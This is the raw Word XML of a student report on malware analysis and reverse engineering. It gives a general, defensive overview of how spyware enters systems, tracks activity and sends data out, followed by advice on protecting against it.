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0699" w14:textId="77777777" w:rsidR="00E72123" w:rsidRPr="002C7722" w:rsidRDefault="00E72123" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6B56DD" wp14:editId="018E25D4">
            <wp:extent cx="5731510" cy="1546860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="172022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14:paraId="158547A1" w14:textId="40206024"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48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Malware Analysis and Reverse Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437D700" w14:textId="77777777" w:rsidR="002C7722" w:rsidRPr="002C7722" w:rsidRDefault="002C7722" w:rsidP="002C7722">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D40040D" w14:textId="77777777" w:rsidR="002C7722" w:rsidRPr="002C7722" w:rsidRDefault="002C7722" w:rsidP="002C7722">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SUBMITTED BY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D7507E" w14:textId="70F81CDA" w:rsidR="002C7722" w:rsidRPr="002C7722" w:rsidRDefault="002C7722" w:rsidP="002C7722">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r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Team </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2804C199" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7"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r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Rahul Sivaselvam 20BCE1724</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983CFD1" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7"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r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Aditya Pratap Yadav 20BCG10038</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C85879" w14:textId="26A676D6" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7"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roofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Vishnuram</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> G 20BCE1210</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6E1BE" w14:textId="5B29B4D3" w:rsidR="00A02BD7" w:rsidRDefault="00A02BD7"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r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Saumya Srivastava 20BCE10200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BCFE9F" w14:textId="77777777"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024B37F2" w14:textId="77777777"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1E16398E" w14:textId="77777777"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153BCD6C" w14:textId="77777777"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0217D6F5" w14:textId="77777777"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3BE80CD0" w14:textId="77777777"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4F36517D" w14:textId="77777777"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60B59C32" w14:textId="77777777" w:rsid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5F9A5122" w14:textId="77777777" w:rsidR="002C7722" w:rsidRPr="002C7722" w:rsidRDefault="002C7722" w:rsidP="00E72123">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCE128A" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">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1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA15DF" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">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 1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Overview </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5015C867"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The project at hand focuses on the analysis of malware and the practice of reverse engineering. Malware refers to malicious software that is designed to disrupt, damage, or gain unauthorized access to computer systems. Reverse engineering, on the other hand, involves the process of dissecting and understanding the inner workings of software or code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB600B1"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In this project, we delve into the realm of malware analysis and reverse engineering to gain insights into how malware operates, how it can be detected, and how it can be mitigated. By exploring various techniques and tools used in these fields, we aim to enhance our understanding of cybersecurity and contribute to the development of effective countermeasures against malicious software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57456802" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">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1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Purpose </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3E92C"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The purpose of this project is twofold. Firstly, we seek to comprehend the different types of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>malware</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">, their characteristics, and their potential impacts. By studying their </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and techniques, we can better understand the evolving landscape of cyber threats and devise strategies to safeguard against them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D050BA9"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Secondly, we aim to explore the practice of reverse engineering as a means to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and dissect malware. By peering into the underlying code and structures of malicious software, we can uncover valuable information about its functionalities, vulnerabilities, and potential countermeasures. This knowledge can aid in the development of detection tools, incident response techniques, and preventative measures to protect systems and networks from malware attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC98452" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">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2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">LITERATURE SURVEY </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5FB14" w14:textId="77777777" w:rsidR="00DA1F4A" w:rsidRPr="002C7722" w:rsidRDefault="00DA1F4A" w:rsidP="00DA1F4A">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2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:t>Existing problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DE1E70"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 The field of malware analysis and reverse engineering is driven by the pressing need to combat the ever-growing threats posed by malicious software. Existing approaches to solving this problem encompass a range of techniques, including static and dynamic analysis, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>behavioral</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis, sandboxing, and machine learning-based detection algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12425F05"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However, despite the advancements in malware analysis, new forms of malware continue to emerge, often employing sophisticated evasion techniques to bypass traditional security measures. This presents an ongoing challenge for cybersecurity professionals, who must continuously adapt their methodologies and tools to keep pace with evolving threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3EE9F2" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>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What is Spyware?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1E466"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Spyware, the software with malicious intent to enter into your system and track the activities and forward these activities to the 3</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> party without even letting you know about the same.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC3DDB7" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="225" w:after="300" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>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Working of Spyware involves 3 steps;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181DAC52" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD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lastRenderedPageBreak/>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Entering the computer or mobile system via installation package, any malicious image, or even through any website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45687C90" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD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Track</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: When the package starts working, the log of activities tracked in the background. Everything happening on the system gets recorded in the logs either though keylogger, or tracker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F71AF" w14:textId="77777777" w:rsidR="00A02BD7" w:rsidRPr="002C7722" w:rsidRDefault="00A02BD7" w:rsidP="00A02BD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Send</w:t>
      </w:r>
      <w:r w:rsidRPr="002C7722">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: All the information recorded by the malicious software now gets forwarded to the third party. This third party can be an attacker or like these days company use their own tracking mechanisms for their employees too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC75FD3"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Spyware: Understanding the Threat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B3F799"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Spyware is a type of malicious software designed to infiltrate computer systems, mobile devices, or networks with the intention of monitoring user activities and gathering sensitive information without their knowledge or consent. It poses a significant threat to privacy and security, making it essential to understand its workings and take measures to protect against it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272E692C" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C08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Entry Point: How Spyware Infects Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85867D"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Spyware can enter a system through various means, often exploiting vulnerabilities or relying on deceptive tactics. Some common entry points include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F854A85"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a) Malicious Downloads: Users may inadvertently install spyware by downloading infected files or software from unreliable sources. These files can masquerade as legitimate applications or be bundled with freeware/shareware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27889361"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b) Drive-by Downloads: Spyware can be silently installed when visiting compromised websites or clicking on malicious ads. Exploiting security vulnerabilities in browsers or plugins, it leverages automated download and execution techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8AB985"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c) Email Attachments: Spyware can be distributed via email attachments that, when opened, execute malicious code on the victim's system. Social engineering techniques are often employed to trick users into opening these attachments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBEF86"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d) Infected External Devices: Connecting infected USB drives, external hard drives, or other removable media can introduce spyware to a system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152090BE" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Tracking Activities: How Spyware Operates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D912F"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Once spyware gains access to a system, it operates covertly in the background, tracking and recording various user activities. Here are some common methods employed by spyware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2997687B"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a) Keyloggers: Spyware can include keyloggers that record keystrokes, capturing sensitive information such as passwords, credit card details, and personal messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308FF733"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b) Screen Capture: Some spyware can take screenshots at regular intervals, providing a visual record of the user's activities, including browsing habits and application usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B2211"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c) Data Interception: Spyware may intercept network traffic to capture data transmitted over the network, such as emails, instant messages, or login credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26A50B"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lastRenderedPageBreak/>
        <w:t>d) Webcam and Microphone Access: Advanced spyware can even gain unauthorized access to webcams and microphones, allowing remote monitoring of audio and video streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFB5B60" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Data Exfiltration: Sending Information to Third Parties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED52AF"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After collecting user data, spyware transmits this information to a third party, often the attacker responsible for deploying the spyware. The exfiltrated data can be misused for various purposes, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389D120"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a) Identity Theft: Personal information collected by spyware, such as social security numbers, bank account details, or addresses, can be used for identity theft or financial fraud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69289263"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 xml:space="preserve">b) Adware and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C082C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Targeting: Spyware can be employed by advertising networks to gather user data and deliver targeted advertisements based on browsing habits, preferences, and interests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5484D108"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c) Corporate Espionage: In some cases, spyware is used for corporate espionage, where competitors or malicious actors target organizations to gain access to confidential business information or intellectual property.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0653FD6C"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d) Surveillance and Monitoring: Certain entities, such as government agencies or employers, may deploy spyware for surveillance purposes, monitoring individuals' activities for various reasons, which raises serious privacy concerns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2DBFB8"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Protecting Against Spyware:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7920EB7A"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Given the risks associated with spyware, it is crucial to adopt preventive measures to protect your systems and personal information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF6AE43" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Keep Software Updated: Regularly update operating systems, applications, and security software to patch vulnerabilities and protect against known exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588845C9" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Exercise Caution Online: Be cautious when downloading files or clicking on links from unknown or suspicious sources. Verify the authenticity of websites before sharing personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA1D30" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Use Reliable Security Software: Install reputable antivirus and anti-spyware software to detect and remove spyware infections. Keep the software definitions up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766EAD3A" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Enable Firewalls: Enable and configure firewalls to monitor incoming and outgoing network traffic, blocking unauthorized access and potentially harmful connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF86E67" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Practice Safe Email Habits: Avoid opening email attachments or clicking on links from unknown or untrusted sources. Be vigilant for phishing attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB02149" w14:textId="77777777" w:rsidR="008C082C" w:rsidRPr="008C082C" w:rsidRDefault="008C082C" w:rsidP="008C082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Educate Yourself: Stay informed about current threats and common tactics used by cybercriminals. Regularly educate yourself and your organization on best practices for cybersecurity.</w:t>
      </w:r>
    </w:p>
